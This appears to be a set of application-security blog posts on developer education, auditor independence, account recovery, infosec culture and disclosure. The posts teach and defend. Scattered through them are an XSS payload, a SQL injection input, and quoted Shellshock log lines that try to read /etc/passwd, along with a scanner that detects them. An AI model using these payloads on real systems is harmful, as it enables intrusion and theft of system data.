Looking back at 2009 and Predictions for 2015

I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that, besides the dramatic increase in mobile assessments over the last year or two, the things I was banging on about in 2009 are still issues today:

Developer education is woeful. I recently did an education piece for a developer crowd at a client, and only two of the 30 knew what XSS was, and only one of them was aware of OWASP. At least at a university event I did later in the year, about 20% of the students were aware of OWASP, XSS, SQL injection and security. The other 80% – not so much. I hope I reached them!

Agile security is woeful. When agile first came out, I was enthralled by the chance for an SDLC to be secure by default because teams wrote tests. Unfortunately, many modern-day practitioners decided that all non-functional requirements fall into the category of “you ain’t gonna need it”, and so the state of agile SDLC security is just abysmal. There are some shops that get it, but this year I made the acquaintance of an organisation that prides itself on being an agile thought leader, and which told our mutual client they don’t need any of that yucky documentation, up-front architecture or design, or indeed any security stuff, such as constraints or filling in the back of the card with non-functional requirements.

Security conferences are still woeful. Not only is there a distinct lack of diversity at many conferences (zero women speakers at Ruxcon, for example), but very few have “how do we fix this?” talks. Take, for example, the recent CCC event in Berlin. The media latched onto talks about biometric security failing (well, duh!) and SS7 insecurity (well, duh, if you’ve EVER done any telco stuff). Where are the talks about sending biometrics to the bottom of the sea with concrete shackles, or replacing SS7 with something the ITU hasn’t interfered with?

Penetration testing still needs to improve. I accept some of the blame here, because I was unable to change the market – pen tests still sell really well. We really need to move on from pen tests as a wasted opportunity cost for actual security. We should be selling hybrid application verifications – code reviews with integrated pen tests to properly sort out the exploitability of vulnerabilities. Additionally, there is a race to the bottom of the barrel, with folks selling 1-2 day automated tests as equivalent to a full security verification for as little money as they can. We need a way of distinguishing weak tests from strong tests so the market can weed out useless checkbox testing. I don’t think red teaming is the answer, as it’s a complete rod length check that can cause considerable harm unless performed with specific rules of engagement – rules that most red team folks would say invalidate a red team exercise.

Secure supply chain is still an unsolved problem. No progress at all since 2009. Software enjoys the unique position that, unlike all other goods and services, it is somehow special and needs special liability protection. That might have been true back in the ’70s during the homebrew days, but it’s not true today, and until that liability position is reversed, nothing will change. We are outsourcing and out-tasking more and more every day, and unless suppliers are required to uphold the standard fit-for-purpose rules that all other manufacturers and suppliers have to, we are going to see more and more breaches and end-of-company events. Just remember: you can outsource all you like, but you can’t outsource responsibility. If managers are told “it’s insecure” and take no or futile steps to remediate it, I’m sorry, but those managers are accountable and liable.

At least, due to the rapid adoption of JavaScript frameworks, we are starting to see a decline in traditional XSS. If you don’t know how to attack responsive, JSON or XML API based apps via DOM injection, you are missing out on new-style XSS. Any time someone tells you that security is hard to adopt because it requires so much refactoring, point them at any responsive app that started out life a long time ago. There’s way more refactoring in moving to responsive design and RESTful APIs than in adding security.
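
For those who haven’t seen new-style XSS up close, the heart of it is untrusted API data meeting an unsafe DOM sink. A minimal sketch in TypeScript – the endpoint and element IDs are illustrative, not from any real app:

    // dom-xss.ts – a minimal sketch of DOM-based XSS in an API-driven app.
    // The endpoint and element IDs are hypothetical.
    async function renderComment(): Promise<void> {
      const response = await fetch("/api/comments/latest");
      const comment: { body: string } = await response.json();

      // VULNERABLE: attacker-controlled JSON flows straight into a DOM sink,
      // so a body like '<img src=x onerror=alert(1)>' executes in the page.
      document.getElementById("comment")!.innerHTML = comment.body;

      // SAFER: textContent treats the same payload as inert text, not markup.
      document.getElementById("comment-safe")!.textContent = comment.body;
    }

    renderComment().catch(console.error);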

Again, due to the adoption of frameworks such as Spring MVC and so on, we are starting to see a slight decline in the number of apps with CSRF and SQL injection issues. SQL injection used to turn up in about 20-35% of all apps I reviewed in the late 2000s; now it’s fairly rare. That said, I had some good times in 2014 with SQL injection.
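
Most of that framework effect comes down to parameterised queries becoming the default rather than something developers must remember. As a reminder of the difference, a minimal sketch using the node-postgres (pg) client – the table, columns, and connection details are hypothetical:

    // sqli.ts – string-built vs parameterised SQL with node-postgres.
    // The users table and connection details are hypothetical.
    import { Pool } from "pg";

    const pool = new Pool(); // connection settings come from PG* environment variables

    // VULNERABLE: an email of "' OR '1'='1" rewrites the query's meaning.
    async function findUserUnsafe(email: string) {
      return pool.query(`SELECT id, name FROM users WHERE email = '${email}'`);
    }

    // SAFE: the driver ships the value separately from the SQL text,
    // so it can never be interpreted as SQL.
    async function findUser(email: string) {
      return pool.query("SELECT id, name FROM users WHERE email = $1", [email]);
    }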

The only predictions I will make for 2015 are a continued move to responsive design using JavaScript frameworks for web apps, a concerted movement towards mobile-first apps, again with REST backends, and an even greater shift towards cloud, where there is no perimeter firewall. Given the lack of security architecture and coding knowledge out there, we really must work with the frameworks, particularly those on the backend, like node.js and others, to protect front-end web devs from themselves. Otherwise, 2015 will continue to look much like 2009.
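
What “working with the frameworks” might look like in practice is secure-by-default middleware on the backend, so front-end devs inherit sane protections without having to think about them. A minimal sketch using Express and helmet – the Content-Security-Policy shown is an illustrative baseline, not a complete policy:

    // server.ts – a sketch of secure-by-default middleware with Express
    // and helmet. The CSP below is an illustrative baseline only.
    import express from "express";
    import helmet from "helmet";

    const app = express();

    // helmet() sets a batch of protective headers (X-Content-Type-Options,
    // Strict-Transport-Security, frame protections, and so on) by default.
    // A restrictive Content-Security-Policy pushes back against XSS even
    // when a template or DOM sink slips through review.
    app.use(
      helmet({
        contentSecurityPolicy: {
          directives: {
            defaultSrc: ["'self'"],
            scriptSrc: ["'self'"], // no inline script, no third-party script
          },
        },
      })
    );

    app.get("/", (_req, res) => res.send("hello"));
    app.listen(3000);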

So the best predictions are those you work on to fix. To that end, I was recently elected by the OWASP membership to the Global Board as an At Large member. And if nothing else – I am large!

  • I will work to rebalance our funding. Instead of delivering most of OWASP’s funds directly back to members – who pay us a membership fee and then don’t spend the allocated chapter funds – we should focus on building OWASP’s relevance and future by spending around 30% on our projects, standards, and training, 30% on outreach, 30% on membership, and 10% or less on admin overheads.
  • I will work towards ensuring that we talk to industry standards bodies and deal OWASP into the conversation. We can’t really complain about ISO, NIST, or ITU standards if they don’t have security SMEs to help draft these standards, can we?
  • I will work towards redressing the gender and regional diversity of our conferences, as well as creating a speaker list that developer conferences can browse to invite great local appsec experts for talks. We have so many great speakers with so much to say, but we have to get outside the echo chamber!
  • We have to increase our outreach to universities. We’ve lost the opportunity to train the folks who will become the lead devs and architects in the next 5-10 years, but we can work with the folks coming up behind them. Hopefully we can also invest time and effort in outreach to those already in the industry in senior/lead developer, architect, and business analyst roles, but in terms of immediate bang for buck, we really need to move university-level education beyond the few “ethical hacking” courses (which are a trade qualification), and work on building security knowledge into the software engineers and comp sci students of the future. Ethical hacking courses have a place … for security experts, but for coders, they are a complete waste of time. Unless you are doing offensive security as your day job, software devs do not need to know how to discover vulnerabilities and code exploits, except in the most general of ways.

It’s an exciting time, and I hope to keep you informed of any wins in this area.

Independence versus conflict of interest in security reviews

I was giving a lecture to some soon-to-graduate folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”.

No, it’s not. And here’s why.

Conflict of interest

It’s only a conflict of interest if a developer who wrote the code then reviews that code and declares it free of bugs (or indeed, is honest and declares it full of bugs). In either case, it’s self-review, which is a conflict of interest.

Likewise, the only way an auditor is in a conflict of interest is if the auditor reviews code they themselves wrote. Again, that is self-review.

An interesting corner case that requires further thought is a rare one indeed: I wrote or participated in a bunch of OWASP standards, some of which became bits of other standards and certifications, such as PCI DSS section 6.5. Am I self-reviewing if I review code or applications against these standards?

I think not, because I am not changing the standard to suit the review (which would be an independence issue), and I’m not reviewing the standard itself (which would be self-review, and thus a conflict of interest).

Despite this, where I think an independence-in-appearance issue might arise, I always disclose that I created or had a hand in the various standards involved – especially if I recommend that a client use a standard I helped write.

Independence

Independence is not just an empty word; it’s a promise to our clients that we are not tied to any particular vendor or methodology. We can’t be a trusted advisor if we’re a shill for a third party or are willing to compromise the integrity of a review at a customer’s request.

The usual definition of independence is two-pronged:

  • Independence in appearance. Someone might think you are compromised because of your affiliations or financial interests, such as a previous job. For example, if you’ve always worked for incident response tool vendors and then move to a security consultancy, you might feel you are independent, but others might perceive you as having a pro-IR-toolset point of view.
  • Independence in actuality. If you own shares in a product or get a financial reward for selling it, any recommendation you make about that product is suspect. This is the reason I want OWASP to remain vendor neutral.

If either of these prongs is violated, you are not independent. But just as humans are complex, there are many aspects to independence, and I’ve not learnt them all. I know most of the issues, though – been there, got the t-shirt.

If you are an independent reviewer, there are a few areas of independence that I refuse to relinquish (and I hope you do too!):

  • Scoping questions. I don’t mind customers setting a scope, but I will often argue for the correct scope before we start. Too narrow a scope can railroad a review into giving an answer the client wants, rather than a proper independent review.
  • Review performance independence. If the client tries to make the review so short that I can’t complete my normal review program effectively, stops me from getting the information I need, or tries to frame negative observations in a lesser or “meh” context, I will resist. I want the review to be accurate, but not at the expense of abandoning my methodology or falling below my usual standards.
  • Risk ratings and findings. In the last few years, I’ve had to resist folks trying to force real findings to become unrated opportunities for improvement (by definition, all of my findings are such), trying to argue risk ratings down, or getting words changed to suit a desired outcome. Again, I want the context to be accurate, and I will listen to your input and arguments, but only I will write the report and set the risk ratings. Otherwise, why bother hiring an external reviewer? You could write your own report and set the ratings to suit. It doesn’t work that way.

Does independence always need to be achieved?

My personal view on this has changed over the years. I used to toe the strict party line on independence.

However, sometimes as a reviewer, you can be part of the solution. I personally believe that a good working relationship between the reviewer and the folks who produced the application or code is a good thing. Both parties can learn from working closely together, work out the best approach to resolving issues, and test it rapidly.

As long as the self-review aspect is properly managed, I believe this to be a good path forward. I don’t see it as being any different from a traditional review that recommends fix X and then verifies that X has been put into place. However, if the auditor is editing code, that line has been crossed.

Work with the business to document agreed rules of engagement early, prior to work commencing. Both parties will get a lot more mileage from a closely cooperative review than from the “pay someone to sit in the corner for two weeks” engagement that is the standard fare of our industry.

Conclusion

Working together has obvious independence issues, particularly from an appearance point of view. So, to the excellent question from the student today: working tightly with the auditors is not a conflict of interest, but it can be an independence issue if not properly managed by both the business and the reviewer.

Some people don’t get the hint

85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
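
For the curious: those User-Agent strings are Shellshock (CVE-2014-6271) probes – the “() {” marker is the telltale signature. If you want to sweep your own access logs for them, a minimal sketch for Node.js follows; the log path is illustrative:

    // shellshock-scan.ts – flag Shellshock probes in an Apache access log.
    // The "() {" marker in any request header is the CVE-2014-6271 telltale.
    // The log path below is illustrative.
    import { createReadStream } from "fs";
    import { createInterface } from "readline";

    const SHELLSHOCK_MARKER = /\(\)\s*\{/; // matches "() {" anywhere in the line

    async function scanLog(path: string): Promise<void> {
      const lines = createInterface({ input: createReadStream(path) });
      for await (const line of lines) {
        if (SHELLSHOCK_MARKER.test(line)) {
          console.log(`Shellshock probe: ${line}`);
        }
      }
    }

    scanLog("/var/log/apache2/access.log").catch(console.error);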

So it’s finally happened

Passwords. Pah.

After running my blog on various virtual hosts and VPSs since 1998, the measures I had put in place to protect this site and the others hosted here were insufficient to protect against weak passwords.

Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational security. There will be consequences. That is not a threat.

AppSec EU – DevGuide all day working party! Be a part of it!

Be a part of the upcoming AppSec EU in Cambridge!

Developer Guide Hackathon

* UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. *

Eoin Keary and I will be running an all-day working party on the Developer Guide on June 24, from 9 AM to 6 PM GMT. The day starts with Eoin giving a DevGuide status update talk, and then we get down to editing and writing.

I will be working remotely from the end of Eoin’s talk until 1 PM UK time, so I encourage everyone who has an interest in the DevGuide to either attend the workshop in person or consider helping out remotely. Sign up here!

https://www.owasp.org/index.php/Projects_Summit_2014/Working_Sessions/004

My goal is to get the entire text of the OWASP Developer Guide 2.0 ported to the new format at GitHub, and hopefully to finish four chapters. To participate, you will need a browser and a login to GitHub. You will also probably want a login to Google+ so you can join an “on air” all-day hangout, ask me anything about the DevGuide, or just chill with other remote participants.

Stop. Just stop.

In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr), has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is that the chorus of “It’s not real”, “It’s impossible”, “It’s fake” is becoming overwhelming without sufficient evidence one way or the other. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

  1. Because I personally can’t verify this issue is true, the issue must be false. QED.

This fails both Logic 101, class 1, and the scientific method.

This is not a technical issue, it’s a people issue.

We must support all of our researchers, particularly the wrong ones. This should be entirely obvious: if we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly, “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong and foolhardy; it works for the click-bait articles the journalists write and for their news cycle, not for us.

Not everybody is a viable candidate for holding the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security, and the budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to need the electronic equivalent of a PC4 bio lab. Most labs are not PC4, and I bet most infosec computing labs are nowhere near capable of hosting this sample.

Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together – pulling together electrical engineering folks with the sort of expensive equipment only a well-funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, and we must rule out the easy dismissal of “well, a $0.10 audio chip will do that, as most of them are paired with $0.05 speakers, and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and its lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

We must allow sufficient time for the researchers to collaborate, reach a positive or negative result, analyse their findings, and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24-hour news cycle is their problem, not our problem. We have Twitter, Google Plus, and conferences. Have some respect and wait a little before running to the nearest journalist “friend” and bleating “It’s an obvious fake”.

We owe a debt to folks like Dragos who get odd results, and who are brave enough to report them publicly. Odd results are what push us forward as an industry. Cryptanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen next time. What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

Our industry’s story is not the story of the little boy who cried wolf. We are (or should be) more mature than a child’s nursery tale. Have some respect for our profession, and work with researchers rather than sullying their names (and yours and mine) by announcing, before you have proof, that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened – I try every trick in the book, including the bleeding-edge stuff, as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet few of us could have gotten as far as Dragos has.

To me, we must step back and work together as an industry – ask Dragos: “What do you need?” “How can we help?” – and if the answer is “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser, or a microcontroller dev system plus some mad soldering skills, well, help him, don’t tear him down. Dragos has shown he has sufficient operational security to research this one for another 12-24 months. We don’t need to know now, now, or now. We gain nothing by trashing his name.

Just stop. Stop trashing our industry, and let’s work together.

So your Twitter has been hacked. Now what?

So I’m getting a lot of Twitter spam with links to install bad crap on my computer.

More than just occasionally, these DMs are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions.

So what do you need to do?

Simple. Follow these basic NIST-approved steps:

Contain – find out how many of your computers are infected. If you don’t know how to do this, assume they’re all suspect, and ask your family’s tech support. I know you all know the geek in the family, as it’s often me.

Eradicate – Clean up the mess. Sometimes, you can just use anti-virus to clean it up, other times, you need to take drastic action, such as a complete re-install. As I run a Mac household with a single Windows box (the wife’s), I’m moderately safe as I have very good operational security skills. If you’re running Windows, it’s time for Windows 8, or if you don’t like Windows 8, Windows 7 with IE 10.

Recover – If you need to re-install, you had backups, right? Restore them. Get everything back the way you like it.

  • Use the latest operating system. Windows XP has six months left on the clock. Upgrade to Windows 7 or 8. Mac OS X 10.8 is a good upgrade if you’re still stuck on an older version. There is no reason not to upgrade. On Linux or your favorite alternative OS, there is zero reason not to use the latest LTS or latest released version. I make sure I live within my home directory, and I keep a list of packages I like to install on every new Linux install, so I’m productive in Linux about 20-30 minutes after installation.
  • Patch all your systems with all of the latest patches. If you’re not good with this, enable automatic updates so it just happens for you. You may need to reboot occasionally, so do so when your computer asks. On Windows 8, it only takes 20 or so seconds. On Mac OS X, it even remembers which apps and documents were open.
  • Use a safer browser. Use IE 10. Use the latest Firefox. Use the latest Chrome. Don’t use older browsers or you will get owned.
  • On a trusted device, preferably one that has been completely re-installed, it’s time to change ALL of your passwords, as they are ALL compromised unless proven otherwise. I use a password manager. I like KeePassX, 1Password, and a few others. None of my accounts shares a password with any other account, and they’re all ridiculously strong (see the sketch after this list).
  • Protect your password manager. Make sure you have practiced backing up and restoring your password file. I’ve got it sprinkled around in a few trusted places so that I can recover my life if something bad was to happen to any single or even a few devices.
  • Backups. I know, right? It’s always fun until all your data and life is gone. Backup, backup, backup! There are great tools out there – Time Capsule for Mac, Rebit for Windows, rsync for Unix types.
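
As an illustration of “ridiculously strong”: a password manager’s generator is essentially a cryptographically secure random pick over a large symbol set. A minimal sketch, assuming Node.js and its built-in crypto module; the length and character set are arbitrary choices:

    // genpass.ts – a minimal sketch of strong password generation.
    // Uses Node's CSPRNG (crypto.randomInt) rather than Math.random(),
    // which is not safe for secrets.
    import { randomInt } from "crypto";

    const SYMBOLS =
      "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" +
      "0123456789!@#$%^&*()-_=+[]{};:,.<>?";

    function generatePassword(length = 25): string {
      let password = "";
      for (let i = 0; i < length; i++) {
        // randomInt draws uniformly from [0, SYMBOLS.length)
        password += SYMBOLS[randomInt(SYMBOLS.length)];
      }
      return password;
    }

    console.log(generatePassword()); // 25 random chars ≈ 160 bits of entropy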

Learn and improve. It’s important to make sure that your Twitter feed remains your Twitter feed – and, in fact, the same goes for all of your other accounts, too.

I never use real data for security questions and answers, such as my mother’s maiden name, which is a public record, or my birth date, which, like everyone else, I celebrate once per year, so you could work it out if you met me even randomly at the right time of the year. These are shared-knowledge questions, and an attacker can use them to bypass Twitter’s, Google’s, and Facebook’s security settings. I either make the answer up or just insert a random value. For something low-security, like a newspaper login, I don’t track these random values, as my password manager keeps track of the actual password. For high-value sites, I will record the random value for “What’s your favorite sports team?”. It’s always fun reading out 25 characters of gibberish to a call centre in a developing country.

Last word

I might make a detailed assessment of the DM spam I’m getting, but honestly, it’s so amateur hour I can’t really be bothered. There is no “advanced” persistent threat here – these guys are firmly in “why try harder?” territory, because folks don’t undertake even the most basic self-protection.

Lastly – “don’t click shit”. If you don’t know the person or the URL seems hinky, don’t click it.

That goes double for infosec pros. You know better – or you will, just after you click the link in Incognito / private mode. Instead, if you really insist on getting pwned, why not fire up that vulnerable but isolated XP throw-away VM with a MITM proxy and do it properly? If you don’t have time for that, don’t click shit.

Infosec apostasy

I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security:

  • Those who aim, via the usual suspects, to protect things
  • Those who aim, via often controversial and novel means, to protect people

Think about this for one second. If your compliance program is entirely about protecting critical data assets, you’re protecting things. If your infosec program is about reducing fraud, building resilience, or reducing harmful events, you’re protecting people, often from themselves.

I didn’t think my rather longish post, which brought together the ideas of the information swarm (it’s there, deal with it), information security asymmetry, and pets/cattle (I rather like this one), would land with a heavy thud akin to 95 bullet points nailed to the church door.

So I started thinking – why do people still promulgate stupid policies that have no bearing on evidence? Why do people still believe in policies, standards, and spending squillions on edge and endpoint protection when it is trivial to break them?

Faith.

Faith in our dads and granddads – that their received wisdom is appropriate for today’s conditions.

“Si Dieu n’existait pas, il faudrait l’inventer” – Voltaire

(Literally, “If God did not exist, it would be necessary to invent him”. Often mis-translated as “if religion did not exist, it would be necessary to create it”, but close enough for my purposes.)

I think we’re seeing the beginning of infosec religion, where it is not acceptable to speak up against unthinking enforcement of hand-me-down policies like 30-day password resets or absurd password complexity, and where it is impossible to ask for reasonable alternatives when you attempt to rule out imbecilic ones like basic authentication headers.

We cannot expect everyone using IT to do it right, or to have high levels of operational security. Folks often have a quizzical laugh at my rather large random password collection and my use of virtual machines to isolate Java and an icky SOE. But you know what? When LinkedIn got pwned, I had zero fear that my use of LinkedIn would compromise anything else. I had used a longish random password unique to LinkedIn, so I could take my time resetting it, safe in the knowledge that even with the best GPU crackers in existence, the heat death of the universe would come before my password hash was cracked. Plenty of time. Fantastic … for me, and I finally get a pay-off for being so paranoid.
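
For the sceptics, here is the back-of-the-envelope arithmetic behind that claim – the password length, symbol set, and guess rate below are illustrative assumptions, not figures from the actual incident:

    // cracktime.ts – rough crack-time estimate for a random password.
    // Assumptions (illustrative): 20 characters drawn uniformly from 87
    // printable symbols, against an attacker sustaining 10^12 guesses
    // per second on a fast unsalted hash.
    const symbols = 87;
    const length = 20;
    const guessesPerSecond = 1e12;

    const entropyBits = length * Math.log2(symbols); // ≈ 128.9 bits
    const avgSeconds = 2 ** (entropyBits - 1) / guessesPerSecond; // average case
    const years = avgSeconds / (60 * 60 * 24 * 365);

    console.log(`entropy ≈ ${entropyBits.toFixed(1)} bits`);
    console.log(`average crack time ≈ ${years.toExponential(1)} years`);
    // ≈ 1e19 years – hundreds of millions of times the age of the universe.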

But… I don’t check my main OS every day for malware I didn’t create. I don’t check the insides of my various devices for evil-maid MITM implants or keyloggers. Let’s be honest – no one but the ultra-paranoid does this, and they don’t get anything done. But infosec purists expect everyone to have a bleached-white, pristine machine to do things on – or else the user is at fault for not maintaining their systems.

We have to stop protecting things and start protecting humans, by creating human-friendly, resilient processes with appropriate checks and balances that do not break as soon as a keylogger, a network sniffer, or, more to the point, some skill is brought to bear. Security must be agreeable to humans, transparent (in plain sight as well as easy to follow), and equitable, and the user has to be in charge of their identity, their linked personas, and ultimately their preferred level of privacy.

I am nailing my colors to the mast – we need to make information technology work for humans. It is our creature, to do with as we want. This human says “no”.

Marketing – first against the wall when the revolution comes

A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call.

*Click*

As a consumer, you must hang up to avoid being scammed. End of story. No exceptions.

Even if the business has a relationship with the consumer, asking them to prove who they are is wildly inappropriate. Under no circumstances should a customer be required to provide personal information to an unknown caller. It must be the other way around – the firm must provide positive proof of who they are! And by calling the client, the firm already knows who the client is, so there’s no reason for the client to prove who they are.

As a business, you are directly hurting your bottom line and snatching defeat from the jaws of victory by asking your customers to prove their identity to you.

This is about the dumbest marketing mistake ever – many customers will automatically assume (correctly, in my view) that the campaign is a scam and repeatedly hang up, lowering goal completion rates and driving up the cost of sales. This dumb move can cost a company millions in opportunity costs in the form of:

  • wasted marketing (hundreds of dropped customer contacts for every “successful” completed sale),
  • increased fraud against the consumer, and ultimately the business, when customers reject fraudulent transactions, and
  • the loss of thousands, if not hundreds of thousands, of customers – and their ongoing and future revenue – when they lose trust in the firm, or when the firm’s lack of fraud prevention lets scammers easily harvest PII from the customer base and misuse it.

Customers hate moving businesses once they have settled on a supplier of choice, but if you keep on hassling them the wrong way, they do up and leave.

So if any of you are in marketing, or are facing pressure from the business to start your call script by asking for personally identifying information from your customers: you are training your customers to become victims of phishing attacks, and that will cost you millions of dollars and many more lost customers than doing the right thing ever would.

It’s well past time to change this very, very, very bad habit.

Responsible disclosure failed – Apple ID password reset flaw

Responsible disclosure is a double-edged sword. The Faustian bargain is that I keep my mouth shut to give you time to fix the flaws – not for you to ignore me. I would humbly suggest that it is very relevant to your interests when a top security researcher submits a business logic flaw that is trivially exploitable with just iTunes or a browser, requiring no actual hacking skills.

If anyone knows anyone at Apple, please re-share or forward this post, and ask them to review the rather detailed description of my rather simple method of exploiting the Apple ID password reset system, which I submitted over six months ago and which has so far received zero response beyond an automated reply. The report tracking number is #221529179, submitted August 12, 2012.

My issue should be fixed, along with the other reported issues, before they bring password reset back online – it must not come back with my flaw intact.